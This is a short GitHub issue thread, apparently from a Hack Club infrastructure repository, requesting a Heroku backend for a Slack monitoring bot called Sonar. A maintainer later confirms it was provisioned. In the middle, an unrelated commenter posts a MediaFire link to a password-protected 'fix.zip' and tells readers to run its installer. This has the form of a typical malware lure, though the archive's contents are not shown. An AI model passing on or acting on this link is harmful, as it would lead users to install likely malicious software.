### ISSUE TITLE
Backend service creation request

### ISSUE THREAD

**Issue by cskartikey** [hackclub/infra#86]
Desired service name: [Sonar](https://github.com/cskartikey/sonar)
It's basically a slack bot that helps monitor things for Fire Dept

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by grymmy** [comment]
Had to provision this with a prefix (hc-) - https://dashboard.heroku.com/apps/hc-sonar
